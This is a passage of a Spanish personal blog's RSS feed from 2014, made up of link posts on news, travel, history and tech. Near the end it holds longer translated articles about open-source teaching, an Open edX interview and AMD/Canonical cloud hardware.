      <guid>https://www.igalvan.es/posts/las-grandes-companias-de-refrescos/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.directoalpaladar.com/salud/las-grandes-companias-de-refrescos-acuerdan-reducir-el-azucar-de-sus-bebidas">Las grandes compañías de refrescos acuerdan reducir el azúcar de sus bebidas</a><br/><br/>    <p>Sería mejor si usaran poco azúcar en vez de reducir un poco el montón enorme que usan, pero al menos es algo.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nexus 6: nueva información confirmarían su existencia</title>
      <link>https://www.igalvan.es/posts/nexus-6-nueva-informacion-confirmarian/</link>
      <pubDate>Thu, 02 Oct 2014 14:18:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/nexus-6-nueva-informacion-confirmarian/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.celularis.com/motorola/asi-sera-nexus-6-segun-android-police/">Nexus 6: nueva información confirmarían su existencia</a><br/><br/>    <blockquote class="link_og_blockquote"><br/><div>Nuevos datos confirmarían la existencia el Nexus 6 y las especificaciones de las que se han hablando, entre ellas su pantalla de 6 pulgadas.</div><br/></blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>No vendas a tu hijo por no leer las condiciones de uso de una red pblica wifi</title>
      <link>https://www.igalvan.es/posts/no-vendas-tu-hijo-por-no-leer-las/</link>
      <pubDate>Thu, 02 Oct 2014 14:14:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/no-vendas-tu-hijo-por-no-leer-las/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.abc.es/tecnologia/redes/20140929/abci-wifi-condiciones-201409291930.html">No vendas a tu hijo por no leer las condiciones de uso de una red pblica wifi</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>5 islas pequeñas que se quedaron congeladas en la Edad Media en Europa</title>
      <link>https://www.igalvan.es/posts/5-islas-pequenas-que-se-quedaron/</link>
      <pubDate>Thu, 02 Oct 2014 14:07:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/5-islas-pequenas-que-se-quedaron/</guid>
      <description><![CDATA[<p>Link: <a href="http://viajes.101lugaresincreibles.com/2014/09/5-islas-pequenas-que-se-quedaron-congeladas-en-la-edad-media-en-europa/">» 5 islas pequeñas que se quedaron congeladas en la Edad Media en Europa Viajes – 101lugaresincreibles -</a><br/><br/>    <p>Sitios inolvidables para perderse por ellos explorando un trozo de la historia de Europa.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El tabaco en China: Su industria, consumo y marcas destacadas</title>
      <link>https://www.igalvan.es/posts/el-tabaco-en-china-su-industria-consumo/</link>
      <pubDate>Thu, 02 Oct 2014 13:53:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-tabaco-en-china-su-industria-consumo/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.chinalati.com/profiles/blogs/tabaco-en-china-industria-consumo-y-marcas-destacadas">El tabaco en China: Su industria, consumo y marcas destacadas</a><br/><br/>    <p>No es por hacer publicidad del tabaco, pero este artículo sobre los cigarrillos en China me ha perecido muy interesante aunque solo sea por aprender sobre las costumbres de ese país.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Fort Mose, el santuario español donde los esclavos fugitivos de EEUU fueron libres</title>
      <link>https://www.igalvan.es/posts/fort-mose-el-santuario-espanol-donde/</link>
      <pubDate>Thu, 02 Oct 2014 13:48:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/fort-mose-el-santuario-espanol-donde/</guid>
      <description><![CDATA[<p>Link: <a href="http://historiasdelahistoria.com/2014/10/02/fort-mose-el-santuario-espanol-donde-los-esclavos-fugitivos-de-eeuu-fueron-libres">Fort Mose, el santuario español donde los esclavos fugitivos de EEUU fueron libres</a><br/><br/>    <p>Un trozo de nuestra historia que todo el mundo debería conocer. El primer asentamiento europeo en EE.UU. fue una fortaleza española.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>5 lugares reales que inspiraron la magia de las animaciones de Miyazaki</title>
      <link>https://www.igalvan.es/posts/5-lugares-reales-que-inspiraron-la/</link>
      <pubDate>Thu, 02 Oct 2014 13:43:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/5-lugares-reales-que-inspiraron-la/</guid>
      <description><![CDATA[<p>Link: <a href="http://viajes.101lugaresincreibles.com/2014/10/5-lugares-reales-que-inspiraron-la-magia-de-las-animaciones-de-miyazaki/">» 5 lugares reales que inspiraron la magia de las animaciones de Miyazaki Viajes – 101lugaresincreibles -</a><br/><br/>    <p>Son tan bonitos que casi no sabes si Miyazaki se inspiró en ellos o crearon estos sitios inspirados en Miyazaki</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Versión Technical Preview de Windows - Microsoft Windows</title>
      <link>https://www.igalvan.es/posts/version-technical-preview-de-windows/</link>
      <pubDate>Thu, 02 Oct 2014 10:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/version-technical-preview-de-windows/</guid>
      <description><![CDATA[<p>Link: <a href="http://windows.microsoft.com/es-es/windows/preview">Versión Technical Preview de Windows - Microsoft Windows</a><br/><br/>    <blockquote class="link_og_blockquote">Obtén información sobre la versión Technical Preview de Windows, descárgala y echa un vistazo al futuro de Windows.</blockquote><br/><br/><p></p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>5000-Year-Old Water Pipeline Discovered in Western Iran - DailyScene.comDailyScene.com</title>
      <link>https://www.igalvan.es/posts/5000-year-old-water-pipeline-discovered/</link>
      <pubDate>Wed, 01 Oct 2014 14:43:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/5000-year-old-water-pipeline-discovered/</guid>
      <description><![CDATA[<p>Link: <a href="http://dailyscene.com/5000-year-old-water-pipeline-discovered-in-western-iran/">5000-Year-Old Water Pipeline Discovered in Western Iran - DailyScene.comDailyScene.com</a><br/><br/>    <blockquote class="link_og_blockquote">A 5000-year-old water system has been unearthed during the second season of a rescue excavation project at the Farash ancient historical site at the Seimareh Dam reservoir area in western Iran.An a</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Did you hear the one about a hedgehog without any spikes?</title>
      <link>https://www.igalvan.es/posts/did-you-hear-one-about-hedgehog-without/</link>
      <pubDate>Wed, 01 Oct 2014 13:35:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/did-you-hear-one-about-hedgehog-without/</guid>
      <description><![CDATA[<p>Link: <a href="http://metro.co.uk/2014/09/28/did-you-hear-the-one-about-a-hedgehog-without-any-spikes-4884612/">Did you hear the one about a hedgehog without any spikes?</a><br/><br/>    <p>Pobrecito, menos mal que ha caído en manos de una buena persona que está cuidando de él.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>A ver si alguién es capaz de explicarnos esto</title>
      <link>https://www.igalvan.es/posts/a-ver-si-alguien-es-capaz-de/</link>
      <pubDate>Wed, 01 Oct 2014 12:26:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/a-ver-si-alguien-es-capaz-de/</guid>
      <description><![CDATA[<iframe width="400" height="225"  id="youtube_iframe" src="https://www.youtube.com/embed/2ktwo-k-onk?feature=oembed&amp;enablejsapi=1&amp;origin=http://safe.txmblr.com&amp;wmode=opaque" frameborder="0" allowfullscreen></iframe>              <p>A ver si alguien es capaz de explicarnos cómo pueden colisionar dos cargueros dentro del Canal de Suez. Un fallo garrafal que no solo ha tenido grandes costes económicos sino que podría haber costado vidas humanas.</p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Muere... y le penalizan por incumplir la permanencia de su teléfono</title>
      <link>https://www.igalvan.es/posts/muere-y-le-penalizan-por-incumplir-la/</link>
      <pubDate>Wed, 01 Oct 2014 11:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/muere-y-le-penalizan-por-incumplir-la/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.cadenaser.com/sociedad/articulo/muere-le-penalizan-incumplir-permanencia-telefono/csrcsrpor/20140919csrcsrsoc_7/Tes">Muere&hellip; y le penalizan por incumplir la permanencia de su telfono</a><br/><br/>    <blockquote class="link_og_blockquote">OCU denuncia esta sorprendente mala practica por parte de las empresas de telefonía</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Amusing Planet: Miniature Dioramas by Satoshi Araki</title>
      <link>https://www.igalvan.es/posts/amusing-planet-miniature-dioramas-by/</link>
      <pubDate>Wed, 01 Oct 2014 10:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/amusing-planet-miniature-dioramas-by/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.amusingplanet.com/2014/09/miniature-dioramas-by-satoshi-araki.html?m=1">Amusing Planet: Miniature Dioramas by Satoshi Araki</a><br/><br/>    <p>okyo based artist <a href="http://arakichi.blog.fc2.com/">Satoshi Araki</a> creates miniature dioramas of chaotic cityscapes that are the result of urban decay or warfare, with amazing detail. Araki’s work is based on images he found on the Internet, explaining how he uses Google image search to look for images from the “Iraq war” and “Iraq ruins”. Araki uses Styrofoam board which he cuts, paints and glues them together to create the scene and populates them with plastic models of cars and scooters.</p><br/><img alt="Diorama" src="http://lh3.ggpht.com/-upM4IGxR6dY/VCUpsLJBEmI/AAAAAAAA7sY/ES3LsuRvPhY/satoshi-araki-12.jpg?imgmax=800" alt=""/></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El consejo de guerra contra Alan Turing ~ Curistoria</title>
      <link>https://www.igalvan.es/posts/el-consejo-de-guerra-contra-alan-turing/</link>
      <pubDate>Tue, 30 Sep 2014 15:52:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-consejo-de-guerra-contra-alan-turing/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.curistoria.com/2014/09/el-consejo-de-guerra-contra-alan-turing.html">El consejo de guerra contra Alan Turing        ~ Curistoria</a><br/><br/>    <p><a href="http://www.telegraph.co.uk/earth/wildlife/11123365/Giant-flesh-eating-leech-filmed-swallowing-huge-earthworm-like-spaghetti.html"><a href="http://www.telegraph.co.uk/earth/wildlife/11123365/Giant-flesh-eating-leech-filmed-swallowing-huge-earthworm-like-spaghetti.html">http://www.telegraph.co.uk/earth/wildlife/11123365/Giant-flesh-eating-leech-filmed-swallowing-huge-earthworm-like-spaghetti.html</a></a></p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Giant flesh-eating leech filmed swallowing huge earthworm like spaghetti - Telegraph</title>
      <link>https://www.igalvan.es/posts/giant-flesh-eating-leech-filmed/</link>
      <pubDate>Tue, 30 Sep 2014 15:03:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/giant-flesh-eating-leech-filmed/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.telegraph.co.uk/earth/wildlife/11123365/Giant-flesh-eating-leech-filmed-swallowing-huge-earthworm-like-spaghetti.html">Giant flesh-eating leech filmed swallowing huge earthworm like spaghetti  - Telegraph</a><br/><br/>    <blockquote class="link_og_blockquote">For the first time a giant, 50cm long, leech has been filmed swallowing a huge blue earthworm in the forests of Borneo for new BBC documentary Wonders of the Monsoon</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Los 8 mejores easter eggs escondidos de Google | Noticiasdot.com</title>
      <link>https://www.igalvan.es/posts/los-8-mejores-easter-eggs-escondidos-de/</link>
      <pubDate>Mon, 29 Sep 2014 15:51:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/los-8-mejores-easter-eggs-escondidos-de/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.noticiasdot.com/wp2/2014/09/28/los-8-mejores-easter-eggs-escondidos-de-google/">Los 8 mejores easter eggs escondidos de Google | Noticiasdot.com</a><br/><br/>    <p>Huevos de Pascua que se encuentran dentro del buscador de Google.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Cuidado con estos gatos que vienen pisando fuerte</title>
      <link>https://www.igalvan.es/posts/cuidado-con-estos-gatos-que-vienen/</link>
      <pubDate>Mon, 29 Sep 2014 14:49:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/cuidado-con-estos-gatos-que-vienen/</guid>
      <description><![CDATA[<iframe width="400" height="225"  id="youtube_iframe" src="https://www.youtube.com/embed/jnk15Wf6xMU?feature=oembed&amp;enablejsapi=1&amp;origin=http://safe.txmblr.com&amp;wmode=opaque" frameborder="0" allowfullscreen></iframe>              <p>Cuidado con estos gatos que vienen pisando fuerte. Muy buena parodia de <em>Assassin&rsquo;s Creed Unity</em> para pasar un rato divertido</p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Kubuntu, un ejemplo de superación - MuyLinux</title>
      <link>https://www.igalvan.es/posts/kubuntu-un-ejemplo-de-superacion/</link>
      <pubDate>Mon, 29 Sep 2014 11:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/kubuntu-un-ejemplo-de-superacion/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muylinux.com/2014/09/26/kubuntu-ejemplo-de-superacion">Kubuntu, un ejemplo de superación - MuyLinux</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Masdar City, la ciudad del futuro que en el presente nadie visita</title>
      <link>https://www.igalvan.es/posts/masdar-city-la-ciudad-del-futuro-que-en/</link>
      <pubDate>Mon, 29 Sep 2014 10:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/masdar-city-la-ciudad-del-futuro-que-en/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.xataka.com/otros/masdar-city-la-ciudad-del-futuro-que-en-el-presente-nadie-visita">Masdar City, la ciudad del futuro que en el presente nadie visita</a><br/><br/>    <p>Por muy idílico que sea un sitio, crear una ciudad en la mitad del desierto es antinatural y es lógico que la gente se resista a mudarse a un lugar así.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>LibreOffice, un ejemplo a seguir en calidad de código - MuyLinux</title>
      <link>https://www.igalvan.es/posts/libreoffice-un-ejemplo-seguir-en/</link>
      <pubDate>Mon, 29 Sep 2014 09:01:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/libreoffice-un-ejemplo-seguir-en/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muylinux.com/2014/09/29/libreoffice-calidad-codigo">LibreOffice, un ejemplo a seguir en calidad de código - MuyLinux</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Los mejores editores WYSIWYG</title>
      <link>https://www.igalvan.es/posts/httpbashooka/</link>
      <pubDate>Thu, 25 Sep 2014 18:30:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/httpbashooka/</guid>
      <description><![CDATA[<p><a href="http://bashooka.com/coding/best-wysiwyg-editors/" target="_blank"><a href="http://bashooka.com/coding/best-wysiwyg-editors/">http://bashooka.com/coding/best-wysiwyg-editors/</a></a><br /></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Estoy de vuelta</title>
      <link>https://www.igalvan.es/posts/estoy-de-vuelta/</link>
      <pubDate>Thu, 25 Sep 2014 14:39:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/estoy-de-vuelta/</guid>
      <description><![CDATA[<p>Después de un largo tiempo inmerso en diferentes proyectos tanto personales como profesionales, he decidido volver a publicar mi <em>blog</em> pero esta vez mucho más informal y variado. Espero que os guste.</p>]]></description>
      
    </item>
    
    
    
    <item>
      <title>La enseñanza de Open Source cambió mi vida</title>
      <link>https://www.igalvan.es/posts/la-ensenanza-de-open-source-cambio-mi/</link>
      <pubDate>Wed, 24 Sep 2014 21:50:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-ensenanza-de-open-source-cambio-mi/</guid>
      <description><![CDATA[<p>Para la mayoría de estudiantes y profesores, nuestras vidas giran en torno a las pruebas. Para los estudiantes, los exámenes determinan si son un éxito o un fracaso. Lo mismo es cada vez más cierto de los docentes. Toma mi carrera como un ejemplo.</p>
<p>Mi primer trabajo a tiempo completo fue como profesor de inglés. Enseñé a los niños japoneses a pasar sus exámenes de acceso a la universidad. Para ellos el fracaso a menudo significaba todo un año adicional de estudio para realizar esos mismos exámenes de nuevo la próxima vez. Unos años más tarde, enseñé en Australia, ayudando a los estudiantes asiáticos a aprobar los exámenes en idioma inglés para que pudieran mantener sus plazas universitarias. Si fracasaban, a menudo se arriesgaban a perder sus visados de permanencia y a ser enviados de vuelta a su país.</p>
<p>Después de llegar a Georgia, trabajé en una escuela secundaria en el área de Atlanta. Nos dijeron que enseñáramos para superar el examen. Y, cuanto más se esforzaban los chicos, más nos dijeron que enseñáramos para superar el examen. Si los estudiantes no superaban el curso y tenían que asistir a la escuela de verano, la regulación se salía de las escalas. Cada profesor de la escuela de verano tenía que asegurarse de que estaba en la misma página del mismo libro, todos los días.</p>
<p>Y, no estoy solo. La mayoría de los maestros tienen historias similares de presiones hacía los estudiantes y los profesores.</p>
<h2 id="libertad-para-pruebas">Libertad para pruebas</h2>
<p>En 2006, cambié de rumbo. Dejé de ser un maestro normal y dejé de enseñar para el examen. Comencé a dar clases de código abierto y creé una compañía llamada <em>Open Source Training</em>.</p>
<p>La enseñanza de código abierto ha sido un soplo de aire fresco para mí y para muchos de nuestros estudiantes ya que con la forma de código abierto, no hay pruebas oficiales. No hay certificación oficial para la mayoría de los proyectos de código abierto. Y, no hay libros de texto prescritos.</p>
<p>En código abierto, ningún empresario para el que valga la pena trabajar le pedirá una prueba oficial de sus habilidades. Un buen empleador verá lo que has hecho y te pedirá que demuestres lo que puedes hacer. Sí, todavía ayuda  tener un Grado en Informática, pero la falta de uno a menudo no supone un
inconveniente.</p>
<p>Muchos de nuestros estudiantes vienen a clase habiendo aprendido por si mismos. Con el código abierto, no hay derechos de licencia a pagar, no hay costos de exámenes, y no hay libros de texto para comprar. Puedes simplemente descargar el <em>software</em> y empezar. Esto nunca podría suceder con las plataformas clásicas, altamente licenciadas, en las que había la necesidad de persuadir a un “representante de ventas de la empresa” para que te diera una clave de licencia. Si enseñamos mediante plataformas como <em>WordPress</em>, ahora es normal encontrarse conque los estudiantes también utilizan el <em>software</em> para el tiempo libre. Lo usan para sus pasatiempos, equipos deportivos, organizaciones no lucrativas, comerciales, grupos religiosos, y mucho más. Los estudiantes lo han hecho por su propia cuenta. Han hecho la investigación, seleccionaron lo que querían usar, y pusieron la pelota a rodar por sí mismos.</p>
<h2 id="mejores-incentivos">Mejores incentivos</h2>
<p>Con el aprendizaje de código abierto, los incentivos son radicalmente diferentes. Los estudiantes no siguen nuestra formación porque quieran saltar una barra que alguien haya puesto. Los estudiantes quieren saltar barras que ellos hayan puesto. Estas son algunas de las cosas que los estudiantes han hecho después de su formación:</p>
<ul>
<li>Empezaron sus propias agencias de diseño <em>web</em>.</li>
<li>Fueron a trabajar para las grandes agencias de diseño <em>web</em> ya existentes.</li>
<li>Crearon sitios para las organizaciones de su comunidad.</li>
<li>Utilizaron <em>software</em> de código abierto para ayudar a su propio negocio.</li>
<li>Utilizaron <em>software</em> de código abierto para mantener su trabajo o conseguir una promoción.</li>
<li>Los estudiantes trabajan duro para lograr grandes cosas, pero eligen los objetivos con los que se sienten cómodos. Esto no es inusual.</li>
</ul>
<p>Cuando era niño, los profesores seguían diciendo:</p>
<blockquote>
<p>Continúe el aprendizaje, la carrera que tendrá no se ha inventado
todavía.</p>
</blockquote>
<p>Bueno, ahora estamos viviendo en un mundo donde nuestro próximo trabajo puede incluso no se han inventado todavía. El modelo anticuado de basado en exámenes no puede adaptarse con la suficiente rapidez o proporcionar los incentivos adecuados. El <em>software</em> de código abierto es flexible, se está fortaleciendo, y se mueve al ritmo que los estudiantes necesitan. Se ve mucho más como el futuro de la educación.</p>
<p>Traducido del original:<a href="http://opensource.com/education/14/9/teachers-students-want-freedom-testing">http://opensource.com/education/14/9/teachers-students-want-freedom-testing</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>3 millones de usuarios y contratando en edX</title>
      <link>https://www.igalvan.es/posts/3-millones-de-usuarios-y-contratando-en/</link>
      <pubDate>Mon, 22 Sep 2014 21:51:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/3-millones-de-usuarios-y-contratando-en/</guid>
      <description><![CDATA[<p>Hay una larga lista de páginas web creadas por Open edX, una plataforma con la esperanza de ser lo suficientemente potente y ampliable que los expertos en educación puedan utilizarla no sólo para desarrollar cursos, sino para probar nuevas ideas sobre cómo educar en línea. Revisa la lista completa en <em>GitHub</em>.</p>
<p>En esta entrevista, se habló con Ned Batchelder de <em>Open edX</em> acerca de su equipo (foto de abajo, Ned va de azul) en la que dice que están trabajando para hacer de la plataforma</p>
<blockquote>
<p>&ldquo;el mejor lugar paraexperimentar con nuevas ideas, y luego compartir esas ideas con otros educadores que puedan basarse en ellas y hacer sus propias mejoras&rdquo;.</p>
</blockquote>
<p>Vamos a ver cómo están planeando llegar a esa meta.</p>
<h2 id="por-qué-siente-los-sitios-que-ejecutan-open-edx-han-optado-por-hacerlo">¿Por qué siente los sitios que ejecutan <em>Open edX</em> han optado por hacerlo?</h2>
<p>Creo que los educadores eligen <em>Open edX</em> porque están buscando una plataforma que ofrezca un gran conjunto de herramientas de partida (evaluaciones sostificadas, creación de contenido de fácil de uso, etcétera), pero que también les dé la posibilidad de ampliar la plataforma. La API <em>XBlock</em> les permite construir nuevos componentes interactivos para sus cursos. Pero más allá de nuestras APIs, toda la plataforma es de código abierto, por lo que no están limitados por lo que hemos elegido ofrecer.</p>
<p>Pueden extenderlo como desean probar nuevas ideas. El objetivo de <em>edX</em> es más grande que llevar la educación libre al mundo. Queremos permitir a los expertos en educación que experimenten con la mejor manera de enseñar en línea. Muchos profesores que enseñan MOOC sestán interesados ​​no sólo en la enseñanza de su curso, pero en el estudio del proceso de aprendizaje en línea. Tienen experiencia con los primeros proveedores de educación en línea y entienden sus limitaciones. Quieren probar nuevas técnicas de enseñanza y necesitan una plataforma que les permita hacerlo.</p>
<p>La tenencia del código fuente es aún más importante en un entorno educativo: las leyes de privacidad del estudiante a menudo ponen restricciones geográficas acerca de donde los datos se pueden hospedar. Las instituciones tienen mayor flexibilidad en la elección en la forma de alojar su instalación de Open edX debido a que tienen acceso completo a todo el código. Pueden crear una estrategia de alojamiento para ajustarse a las leyes más estrictas. Por último, algunas instituciones sólo se sienten más a gusto con el código abierto proporcionado por una organización sin animo de lucro; algo que se ajusta culturalmente con las universidades.</p>
<h2 id="cómo-tú-y-tu-equipo-abordáis-la-tarea-de-construir-una-plataforma-de-software-para-estas-organizaciones">¿Cómo tú y tu equipo abordáis la tarea de construir una plataforma de software para estas organizaciones?</h2>
<p>Al igual que con la construcción de cualquier producto de <em>software</em>, es una cuestión de entender a los usuarios, entender las necesidades que tienen en común, y construir características que apoyen esas necesidades. <em>edX</em> tiene la ventaja de contar con decenas de instituciones de primer nivel como miembros del consorcio. Tenemos una estrecha relación con sus equipos de instrucción, así que tenemos un montón de buena información y comentarios acerca de dónde quieren que vaya la plataforma.</p>
<p>La comunidad de código abierto ofrece más datos, especialmente sobre sus necesidades que difieren, por ejemplo, porque están organizandosus propios casos, en lugar de la realización de cursos en <em>edx.org</em>. En su mayor parte, los ingenieros de <em>edX</em> no son expertos en educación, que son directamente ingenieros de <em>software</em>. Pero eso genera un buen equilibrio: podemos construir la infraestructura de <em>software</em>, guiada por el aporte de los educadores, a continuación, los educadores pueden aprovechar y ampliar la plataforma con componentes especializados. Del mismo modo, los desarrolladores académicos pueden no haber hecho frente a los desafíos de <em>software</em> a los que estamos acostumbrados en un sitio de la tamaño de <em>edx.org</em>.</p>
<p>Tenemos casi 3 millones de usuarios, que no es del tamaño de <em>Facebook</em>, pero es mucho más grande que un proyecto tipo campus. Así que tratamos de unir a los dos dominios: proporcionamos conocimientos de <em>software</em> y las universidades aportarán su experiencia educativa. Puede ser difícil, pero estamos aprendiendo a hablar los lenguajes de los demás, y tratar de diseñar procesos que se acomoden a la mezcla inusual. Los resultados valen la pena.</p>
<h2 id="qué-roles-asumen-en-su-equipo">¿Qué roles asumen en su equipo?</h2>
<p>Yo soy un miembro de los dos equipos. El primero es toda la organización de ingeniería <em>edX</em>. Debido a que todo el código que producimos es de código abierto, cada ingeniero juega un papel en la producción de la plataforma abierta <em>edX</em>. El otro equipo es el equipo <em>Open edX</em>. Estamos acusados ​​de permitir, alentar, y el crecimiento de la comunidad <em>Open edX</em>. En estos momentos somos tres personas pero ¡estamos contratando! Los tres somos ingenieros de profesión, pero con un amor de código abierto y con un aprecio por el valor de estar cara a cara con la gente … ¡incluso si es sólo un cara a cara en la pantalla!</p>
<p>A medida que el equipo crece, vamos a tener personas que tendrán funciones puramente de comunicación y coordinación y también gente que es más técnica, para la construcción de grandes características de interés para la comunidad de código abierto. Toda la organización está muy entusiasmada con que <em>Open edX</em> sea de código abierto, el trabajo especial de mi equipo es ayudar a mantener el mundo del código abierto en la parte superior de la mente, para ser sus defensores dentro de la empresa, y para identificar y corregir los puntos de fricción.</p>
<h2 id="cómo-nivelará-tu-equipo-las-ideas-de-los-educadores">¿Cómo nivelará tu equipo las ideas de los educadores?</h2>
<p>Hay dos maneras en las que podemos utilizar sus ideas.</p>
<p>La primera es incorporarlos como características en la propia plataforma <em>Open edX</em>. Esto requiere los procesos típicos de productos de <em>software</em>: extenso diseño y planificación, implementación, prueba, y así sucesivamente. Sólo las características más ampliamente interesantes se pueden construir de esta manera porque estamos limitados en la cantidad que podemos producir. Tenemos que encontrar el bien común y construir características para apoyarlas. La segunda manera es que podemos construir APIs que permiten a los equipos de instrucción práctica implementar sus propias ideas para sus propios cursos. Esta es una mejor opción para las ideas más especializadas que sólo se aplican a ciertos dominios, o son más especulativos.</p>
<h2 id="cómo-pueden-los-educadores-aprender-más-sobre-la-educación-abierta-y-en-línea">¿Cómo pueden los educadores aprender más sobre la educación abierta y en línea?</h2>
<p>Los equipos académicos pueden implementar nuevas herramientas para la educación y probarlos en <em>Open edX</em>. Hemos construido la mayor parte de la plataforma (¡incluyendo las partes aburridas!), y ellos han construido la herramienta pedagógica interesante en la parte superior. ¡Eso suena como una asociación para mí!</p>
<p>No se trata acerca de nosotros uniéndonos para diseñar una nuevaidea, se trata de cada uno de nosotros teniendo nuestro propio campo de especialización y combinándolos para que podamos hacer aquello en lo que somos buenos, y que ellos puedan hacer en lo que son buenos. Creo en esto como: &ldquo;Hacemos <em>software</em> de modo que tú puedas educar.&rdquo; Siento que este es el núcleo de la filosofía de código abierto. En un mundo de código cerrado, hay claros proveedores y consumidores: &ldquo;Tenemos el código, y tú no, así que tienes que hacer lo que hemos diseñado para ti.&rdquo; En el mundo del código abierto, todo el mundo tiene la capacidad de contribuir donde quieran y puedan. Eso no tiene porque significar que todo el mundo esté trabajando en las mismas piezas, significa que la gente puede gravitar naturalmente a las partes del sistema a las que estén mejor adecuados para trabajar.</p>
<h2 id="puede-decirnos-acerca-de-una-solicitud-de-incorporación-pull-request-que-se-ha-hecho-para-open-edx">¿Puede decirnos acerca de una solicitud de incorporación (pull request) que se ha hecho para Open edX?</h2>
<p>Una de las características que hemos tenido en <em>Open edX</em> desde el principio es &ldquo;dando a entender&rdquo;: una manera para que los instructores ofrezcan consejos a los estudiantes si están respondiendo a los problemas de forma incorrecta. Pero los  investigadores de la educación de la Iniciativa de Aprendizaje Abierto, que han estado estudiando la educación en línea por más de una década, pensaron quese podía hacer mejor. Convocaron a un grupo de expertos para proponer cambios a nuestro sistema de sugerencias y los han implementado. Ese trabajo ha sido presentado como una solicitud de incorporación (<em>pull request</em>), y se encuentra en revisión final para su incorporación a la plataforma central. Es un gran ejemplo de los miembros de la comunidad se unen para impulsar la plataforma hacia adelante y que contribuyen a que el trabajo de nuevo en el núcleo.</p>
<p>Otra área fértil para la experimentación es la interacción social. Una de las claras deficiencias de aprendizaje en línea es la falta de conexiones sociales entre los estudiantes y entre los estudiantes y los instructores. Varios equipos de instrucción y los investigadores han estado experimentando con <em>XBlocks</em> que proporcionan tutoría, vinculación de los estudiantes, anotación, y así sucesivamente, para tratar de volver a agregar algo de la riqueza social de la enseñanza presencial. Eso esclaramente un problema de difícil solución. Tener un montón de grupos que tratan diferentes ideas y ver cuáles atraen será de gran utilidad. No tenemos que pasar por un largo proceso de planificación, y luego plantear una gran apuesta en la característica social que nos gusta. Podemos animar a los diferentes grupos a tratar diferentes ideasy ver lo que funciona.</p>
<p>Fuente original traducida:http://opensource.com/education/14/9/interview-ned-batchelder-openedx</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La nube de AMD y Ubuntu en una caja</title>
      <link>https://www.igalvan.es/posts/la-nube-de-amd-y-ubuntu-en-una-caja/</link>
      <pubDate>Fri, 19 Sep 2014 21:53:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-nube-de-amd-y-ubuntu-en-una-caja/</guid>
      <description><![CDATA[<p>Uno de los mayores éxitos de HP con sus sistemas <em>blade</em> es que lo estaba comercializando como un centro de datos en una caja. Este enfoque fue posteriormente utilizado por otros proveedores de sistemas blade, pero no antes de que HP hubiera conseguido una cuotasignificativa del mercado. AMD y <em>Canonical</em> esperan ahora repetir ese éxito para aquellos clientes que buscan una solución de nube privada que sólo puede caer en su centro de datos.</p>
<p>Este no es el primer intento de meter la nube en una caja. Ya en mayo,en la Cumbre de <em>OpenStack</em> en Atlanta, <em>Canonical</em> anunció <em>UbuntuOrange Box</em>, una colección de 10 microservidores <em>Intel</em> NUC con uso de memoria compartida y un <em>switch gigabit</em>, todo ello alojado en una sola caja. El producto ha tenido cierto éxito, pero no tanto como el que a <em>Canonical</em> le gustaría.</p>
